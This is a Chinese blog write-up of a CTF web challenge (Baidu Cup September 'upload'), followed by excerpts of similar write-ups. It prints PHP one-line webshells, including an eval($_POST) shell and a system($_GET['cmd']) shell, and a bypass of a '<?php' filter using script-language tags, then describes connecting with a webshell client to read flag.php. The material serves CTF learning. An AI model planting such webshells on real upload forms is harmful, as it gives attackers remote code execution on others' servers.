cft-wp-百度杯CTF比赛 九月场(upload)

最新推荐文章于 2022-04-12 23:53:51 发布
原创 最新推荐文章于 2022-04-12 23:53:51 发布 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ctf #writeup #百度杯 #web

本文分享了一次利用网站PHP上传功能的漏洞过程。通过尝试不同的PHP标记方法绕过过滤,成功上传木马并使用菜刀连接,最终找到了flag.php文件,实现了渗透目标。

打开连接 发现有个上传功能:
在这里插入图片描述
上传一句话试试:<?php @eval($_POST['pass']);?>
发现没有路径,看下源码:
在这里插入图片描述
找到路径,上菜刀提示连不上,猜测可能有过滤,或者文件不能被解析,先访问一下看看
在这里插入图片描述
发现<?php 被过滤了。。
翻阅资料找到一种php标记方法,将一句话改为:

<script language="phP"> 
  @eval($_POST["pass"]);
 </script>

上传再试菜刀连接:
在这里插入图片描述
连接成功:找到flag.php
在这里插入图片描述
bingo

百度CTF比赛 九月 upload
drip_big的博客
04-10 492
百度CTF比赛 九月 题目内容: 想怎么传就怎么传,就是这么任性。 tips:flagflag.php中 测试可以上传文件类型 .txt .php.js 都可以上传成功 说明在上传文件的过程中并无拦截 题目中的“想怎么传就怎么传”说的没错 构造php脚本 既然有提示“tips:flagflag.php中 ”,故只要可以阅读flag.php的内容即可。 <?php // get...
百度CTF比赛 九月 Upload解题思路
qq_43473164的博客
05-16 1928
Hello,大家好,我是锘锘鸡。 今天分享给大家的是百度CTF比赛Upload解题思路。 先看下题目 提示flag就在flag.php中。 进入答题链接 发现是文件上传,于是好奇的锘锘鸡开始了他的第一波操作"题下留名",证明自己来过 上传成功后,锘锘鸡惊奇的发现,上传成功在html中是在a标签中的,而且直接链接到文件目录下。 锘锘鸡试着点开!!!click… 嗯??… 锘锘鸡电灯泡一...
百度CTF比赛 九月--web Upload
hanjinrui15的博客
12-30 814
百度CTF比赛 九月--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解题思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
10.28-百度CTF比赛 九月-Web-upload
weixin_43460822的博客
10-29 399
进入题目的页面,如图所示 根据提示,可以猜测此题用的是文件上传漏洞,通过上传一句话木门,然后用菜刀连接获取服务器控制,接着查看flag.php文件即可得到flag。 一句话木门如下: <?php @eval($_POST['Cknife']);?> 发现可以上传成功,通过查看源代码可发现上传的位置,现在通过网址访问试试: 发现过滤了<?php,这是可以试试其他的php标记...
百度CTF比赛 九月 Web-Upload
qq_34106499的博客
01-14 589
1. php一句话木马编写及使用(长标签); 2. 上传文件绕过 ` <? ' , ' php ' 的方法; 3. 菜刀连接php一句话木马;
ibm pe cft-1.4
01-27
IBM服务器使用的PE工具,台式机和笔记本也可以使用,方便快捷,集成大部分阵列
IBM CFT-PE制作
10-08
### IBM CFT-PE制作详解 #### 一、概述 IBM CFT(Configuration and Customization Tools)是一套用于简化IBM服务器部署与管理的工具集。其中CFT-PE(Pre-installation Environment)作为预安装环境的一部分,对于...
精选资源
aws-cft-tools:状态为AWS的AWS中管理云部署的工具
03-16
该gem及其包含的命令( aws-cft )构建在此状态管理系统之上,以创建AWS环境固有的基础架构管理解决方案。 aws-cft-tools使用户可以使用任何形式的目录结构来组织其CloudFormation模板,而无需繁琐地按特定顺序...
服务器PE工具CFT-V0.58
02-03
服务器PE工具
百度CTF比赛 九月 Upload
weixin_43858799的博客
05-19 623
1、 打开题目得到这个界面 2、随便上传一个文件 上传了之后还可以打开 这里就可以尝试上传一个PHP文件获取flag 网页源代码显示 上传路径在u目录下 所以需要…/flag.php 返回上一级 打开flag.php 尝试上传一个php文件读取flag。php文件参考http://www.w3school.com.cn/php/php_file_open.asp <?php $ ...
百度CTF比赛 九月Upload ---------i春秋
weixin_30763397的博客
07-07 360
题目地址:https://www.ichunqiu.com/battalion 创建题目,进入题目环境,看到 文件上传的题型,先试着随便上传一个文件1.txt 直接上传成功了!查看一下源码 看到上传在这个位置,那么接下来就在文件里加一句话木马,然后上传 然后用菜刀链接 但是报错了,好像把php给过滤了,试一下用其他方式 得到flag 转载于:https:...
百度CTF比赛 九月 —— upload
吃肉唐僧的博客
09-07 385
打开题目,发现可以上传任意文件 构造一句话木马文件上传 居然上传成功,点开链接 发现可以查看到代码,<php 应该是被过滤掉了才显示出文本内容 换一种方式 <script language="pHp">@eval($_POST['sb'])</script> 上传,菜刀无链接 拿到flag ...
百度2017-九月-upload
weixin_43622501的博客
11-25 171
Upload 题目描述: 提示flagflag.php中。应该是文件包含类型。 进入题目: 首先尝试进入flag.php文件 http://e72bd1791da64736ae8929a2cac71695278337f40de044bb.game.ichunqiu.com/flag.php 发现提示 here_is_flag 推测就在这个文件里但是被隐藏了,想办法读这个文件的内容。 用之前学...
i春秋 “百度CTF比赛 九月 Upload
include_heqile的博客
09-07 734
https://www.ichunqiu.com/battalion?t=1 这道题其实很简单,就是一道文件上传题,他没有对文件类型作任何过滤,但是去过滤了文件内容php,字符串被过滤掉了,当我们上传&amp;amp;lt;?phpsystem($_GET[&amp;quot;cmd&amp;quot;]);之后,点击上传成功,查看页面源代码,会发现我们的文件被修改成了system($_GET[&amp;quot;cmd&amp;quot;]);,自然而然的我们就会
百度 Upload
qq_40273198的博客
04-26 560
访问赛题 URL, 返回包如下HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 28 Dec 2017 08:19:49 GMT Content-Type: text/html Content-Length: 87 Connection: keep-alive X-Powered-By: PHP/5.5.9-1ubuntu4.19 Set-Cookie...
百度CTF比赛 九月 类型:Web 题目名称:SQLi ---不需要逗号的注入技巧
wkend的博客
05-09 3989
今天在i春秋做题的时候遇到了移到非常好的题目,于是在参考了wp的基础上自己复现了一遍,算作一种技巧的学习与收藏吧。 题目i春秋连接:https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;r=54791 访问地址,发现什么都没有, 查看页面源代码,发现提示 访问地址 http://69ef94c7ef5e47b580ed5c7bae472bc4c3b...
i春秋-web-upload文件内容读取)(百度九月)
Sea_Sand息禅
01-16 678
提示很明显,flagflag.php中,所以,任务就是获取flag.php的内容。 方法一:一句话+菜刀(不再叙述) 方法二:上传脚本,使脚本拥有一定权限,再输出flag 先造一个php脚本 &lt;script language="PHP"&gt; echo((file_get_contents('flag.'.'p'.'h'.'p'))); &lt;/script&gt; ...
百度”信息安全攻防总决赛 Upload
wjd19980925的博客
04-12 514
​ 第一届“百度”信息安全攻防总决赛Upload
i春秋Web-Upload(第一届“百度”信息安全攻防总决赛 线上选拔赛)
Sea_Sand息禅
05-15 2339
查看源码: 告诉我们要上传一个ichunqiu的参数,但是貌似并没有找所谓的find,bp抓包看到响应中有flag的响应头: 但是解码之后上传得到的还是没上传一样的情况,响应头中的flag的内容改变了,网页也告诉我们be a fast man,所以就要写脚本了: import requests import base64 url = 'http://dc587a4fbff7497...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值